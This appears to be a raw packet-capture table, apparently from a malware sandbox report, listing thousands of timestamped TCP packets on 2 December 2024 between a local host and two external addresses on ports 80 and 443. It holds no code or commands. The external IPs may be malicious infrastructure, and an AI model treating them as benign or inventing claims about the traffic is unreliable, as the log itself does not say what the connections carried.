                                                            Dec 2, 2024 07:29:03.949158907 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:03.949168921 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.069272995 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.069329023 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.069386005 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.069428921 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.071122885 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.071166992 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.071235895 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.071281910 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.075355053 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.075397015 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.075460911 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.075503111 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.079590082 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.079653025 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.079695940 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.079737902 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.083651066 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.083695889 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.083766937 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.083811045 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.087790966 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.087853909 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.087876081 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.087910891 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.091895103 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.091967106 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.091974020 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.092005014 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.095947981 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.096003056 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.096045017 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.096087933 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.099993944 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.100038052 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.100045919 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.100079060 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.104111910 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.104176998 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.104259014 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.104295015 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.108201027 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.108264923 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.108299017 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.108340025 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.112349033 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.112392902 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.112409115 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.112449884 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.116368055 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.116413116 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.116466999 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.116509914 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.120476961 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.120522022 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.120628119 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.120841026 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.125205994 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.125243902 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.125272036 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.125282049 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.128653049 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.128701925 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.128758907 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.128801107 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.132716894 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.132761002 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.132885933 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.132930994 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.136809111 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.136853933 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.136918068 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.136960983 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.140938044 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.140985966 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.141062021 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.141103983 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.144980907 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.145025969 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.145097017 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.145142078 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.149090052 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.149133921 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.149183989 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.149226904 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.153177977 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.153223991 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.153419971 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.153464079 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.157267094 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.157327890 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.157414913 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.157459974 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.161387920 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.161431074 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.161467075 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.161514044 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.165441990 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.165486097 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.165565968 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.165611029 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.169511080 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.169569969 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.169651031 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.169696093 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.270107985 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.270170927 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.270205975 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.270256042 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.271789074 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.271831989 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.271905899 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.271950960 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.275147915 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.275192976 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.275304079 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.275347948 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:04.278458118 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:04.278518915 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:08.477725029 CET8049167172.245.123.12192.168.2.22
                                                            Dec 2, 2024 07:29:08.477787018 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:09.160577059 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:09.160629034 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:09.160685062 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:09.163580894 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:09.163594961 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:10.756305933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:10.756371975 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:10.760876894 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:10.760886908 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:10.761189938 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:10.821014881 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:10.867328882 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.150434017 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.150454998 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.150512934 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.150540113 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.175489902 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.175503016 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.175529957 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.175551891 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.175564051 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.175600052 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.270772934 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.270788908 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.270833969 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.270849943 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.365664005 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.365701914 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.367816925 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.367827892 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.399380922 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.399390936 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.399411917 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.399431944 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.399441004 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.399471998 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.421418905 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.421432972 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.421449900 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.421502113 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.442306042 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.442313910 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.442329884 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.442359924 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.442384005 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.469798088 CET4916780192.168.2.22172.245.123.12
                                                            Dec 2, 2024 07:29:11.556039095 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.556051016 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.556076050 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.556098938 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.556296110 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.570358992 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.570369005 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.570419073 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.570429087 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.584595919 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.584606886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.584755898 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.584770918 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.604170084 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.604176998 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.604322910 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.604331970 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.612205982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.612211943 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.612234116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.612257004 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.612265110 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.613863945 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.620481014 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.620487928 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.620543003 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.620549917 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.631570101 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.631577015 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.631627083 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.631633997 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.640101910 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.640109062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.640158892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.640165091 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.758703947 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.758713007 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.758783102 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.758793116 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.765399933 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.765407085 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.765423059 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.765551090 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.765559912 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.765593052 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.774581909 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.774589062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.774611950 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.774651051 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.774674892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.775924921 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.781501055 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.781507969 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.781527042 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.781563997 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.781583071 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.788584948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.788590908 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.788609982 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.788657904 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.797132015 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.797585964 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.797593117 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.797653913 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.797662020 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.797780991 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.804461956 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.804470062 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.804523945 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.804529905 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.811464071 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.811486959 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.811513901 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.811522007 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.811563969 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.820550919 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.820558071 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.820609093 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.820616007 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.828593016 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.828656912 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.828664064 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.835496902 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.835562944 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.835568905 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.958472013 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.958520889 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.958530903 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.964217901 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.964225054 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.964241028 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.964267015 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.964276075 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.964303970 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.970750093 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.970757008 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.970796108 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.970799923 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.970833063 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.976581097 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.976588964 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.976604939 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.976628065 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.976640940 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.982116938 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.982122898 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.982167959 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.982175112 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.987551928 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.987560034 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.987590075 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.987600088 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.987633944 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:11.994637012 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.994645119 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:11.994680882 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.000330925 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.000351906 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.000375032 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.000384092 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.000420094 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.007251024 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.007260084 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.007297993 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.007304907 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.011982918 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.012028933 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.012036085 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.018996000 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.019042015 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.019047976 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.024524927 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.024564981 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.024569988 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.031624079 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.031666994 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.031672955 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.036987066 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.037029028 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.037034988 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.042512894 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.042557955 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.042563915 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.157457113 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.157665014 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.157674074 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.160343885 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.160351038 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.160373926 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.160396099 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.160404921 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.160440922 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.166238070 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.166244984 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.166261911 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.166282892 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.166295052 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.170631886 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.170638084 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.170656919 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.170676947 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.170690060 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.176153898 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.176160097 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.176199913 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.176206112 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.180350065 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.180356026 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.180396080 CET49168443192.168.2.22142.215.209.77
                                                            Dec 2, 2024 07:29:12.180403948 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.184607983 CET44349168142.215.209.77192.168.2.22
                                                            Dec 2, 2024 07:29:12.184636116 CET44349168142.215.209.77192.168.2.22
